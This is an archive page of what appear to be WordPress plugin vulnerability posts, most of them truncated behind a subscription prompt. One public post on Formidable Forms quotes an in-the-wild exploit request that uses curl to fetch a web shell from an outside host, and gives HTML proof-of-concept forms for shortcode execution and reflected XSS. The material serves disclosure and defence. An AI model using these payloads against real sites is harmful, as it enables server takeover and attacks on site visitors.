01 Dec

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in User Role Editor

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

All three changelog entries for version 4.38 of the plugin User Role Editor are security related, possibly indicating that some sort of ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for half off (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

01 Dec

Vulnerability Details: Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Special Text Boxes

Recently the web scanner service Detectify has been vaguely disclosing minor vulnerabilities in a number of WordPress plugins. It seems like they are aware that they could notify the developers of these, but usually haven’t been doing it. One of the more recent batch was an “Authenticated XSS” vulnerability in the plugin Special Text Boxes.

In a previous post we looked at a reflected cross-site ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for half off (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

01 Dec

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Special Text Boxes

Recently the web scanner service Detectify has been vaguely disclosing minor vulnerabilities in a number of WordPress plugins. It seems like they are aware that they could notify the developers of these, but usually haven’t been doing it. One of the more recent batch was an “Authenticated XSS” vulnerability in the plugin Special Text Boxes.

Based on the previous instances we figured that would refer to ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for half off (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

17 Nov

Vulnerability Details: Information Disclosure Vulnerability in ProfileGrid

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

Last week we discussed that checking for usage of outdated third-party libraries is difficult when even a security library ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for half off (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

09 Nov

Vulnerability Details: Shortcode Execution Vulnerability in Formidable Forms

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

When Robert Mathews disclosed that an authenticated remote code execution (RCE) vulnerability that had been in the plugin Shortcodes Ultimate was being exploited his description of the issue also indicated that there has been a vulnerability in the plugin Formidable Forms:

This is a simplified version of an exploit I saw this morning, which didn’t require a contributor role account because it took advantage of the fact that another plugin (“Formidable Forms” accepts untrustedinput and passes it to do_shortcode(). That looked like this:

POST /wp-admin/admin-ajax.php HTTP/1.1

action=frm_forms_preview&form={‘asdf-asdf’}&before_html=[su_meta key=1 post_id=1 default=’curl http://sazinco.ir/wp-content/shell.txt > ../wp-content/upoad.php’ filter=’system’]&custom_style=1

When we went to look into that, we were not able to get that to work in the current version of the plugin. We couldn’t find any recent disclosures of vulnerabilities in the plugins that could explain that. We did notice that last couple of updates had security fixes listed in the changelog, but neither of them seemed to match the issue based on their description.

After looking closer at the current version and not seeing anything in that could explain how POST input sent in that request could have been utilized by the plugin, but noticing something else that we will get to in a separate post, we notified the developer of that disclosure and that other issue. The developer responded that the disclosed issue had been resolved in 2.5.0.2, which was released on October 25. After getting that information, one entry in the changelog for that version stood out:

Fix: XSS vulnerability on form preview page. Don’t check POST values before displaying the form

It turns out by “don’t check POST values”, they really meant don’t use them, which is what was causing the issue.

What seems to be relevant change is in the function setup_new_vars() in the file /classes/helpers/FrmEntriesHelper.php where the following code:

67
68
69
70
foreach ( $form->options as $opt => $value ) {
	$values[ $opt ] = FrmAppHelper::get_post_param( $opt, $value );
	unset($opt, $value);
}

was replaced with the following code in 2.5.0.2:

64
$values = array_merge( $values, $form->options );

That causes the POST inputs’ values to not be used when creating a preview of a form.

In prior version it was possible to execute shortcodes through that as well as use it to cause reflected cross-site scripting (XSS) to occur on the form preview page.

The preview form preview can be accessed through WordPress’ AJAX functionality by those not logged as well those logged in, which we will be the focus of an upcoming post:

add_action( 'wp_ajax_frm_forms_preview', 'FrmFormsController::preview' );
add_action( 'wp_ajax_nopriv_frm_forms_preview', 'FrmFormsController::preview' );

Since this vulnerability is being exploited, we have made this vulnerability details post public (unlike most of them that are limited to our customers) and we are also adding the vulnerability to the free data that comes with our service’s companion plugin, which it would probably be a good idea to be using even if you don’t use our service.

Proof of Concept for Shortcode Execution

The following proof of concept will cause a specified short code to be executed.

Make sure to replace “[path to WordPress]” with the location of WordPress and [shortcode]” with the shortcode to be executed.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=create" method="POST">
<input type="hidden" name="action" value='frm_forms_preview' />
<input type="hidden" name="form" value="{'contact-form'}" />
<input type="hidden" name="before_html" value="[shortcode]" />
<input type="hidden" name="custom_style" value="1" />
<input type="submit" value="Submit" />
</form>
</body>

Proof of Concept for Reflected Cross-Scripting (XSS)

The following proof of concept will cause an alert box with the message “XSS” to be shown. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=create" method="POST">
<input type="hidden" name="action" value='frm_forms_preview' />
<input type="hidden" name="form" value="{'contact-form'}" />
<input type="hidden" name="before_html" value="<script>alert('XSS')</script>" />
<input type="hidden" name="custom_style" value="1" />
<input type="submit" value="Submit" />
</form>
</body>
02 Nov

Vulnerability Details: Cross-Site Request Forgery (CSRF) Vulnerability in WP Fastest Cache

One of the strangest experiences we have had with trying to get a vulnerability fixed involved the plugin WP Fastest Cache. After we had dug into the details that Wordfence failed to include when they disclosed a couple of vulnerabilities in that plugin, we noticed they had missed part of the vulnerabilities (which would be a good reason for them to fully disclose ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for half off (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

01 Nov

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Pretty Links (Lite)

Earlier today we posted the details of a reflected cross-site scripting (XSS) vulnerability in the plugin Pretty Links (Lite) that was somewhat vaguely disclosed by Detectify about a month ago. Shortly after that had been disclosed the website WPCampus had included reference to that in their weekly spreadsheet of vulnerabilities in WordPress, though they pointed to information on a possible different ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for half off (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

01 Nov

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Pretty Links (Lite)

About a month ago we noted that the security scanner service Detectify seemed to have disclosed a number of unfixed reflected cross-site scripting (XSS) vulnerabilities in WordPress plugins that the developers may not have been notified of. One of those was in the plugin Pretty Links (Lite). It looks like the vulnerability that might be referred to there would be only exploitable in the ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for half off (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

31 Oct

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Anti-Malware Security and Brute-Force Firewall

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

About a month we noted that the security scanner service Detectify seemed to have disclosed a number of unfixed reflected ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for half off (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.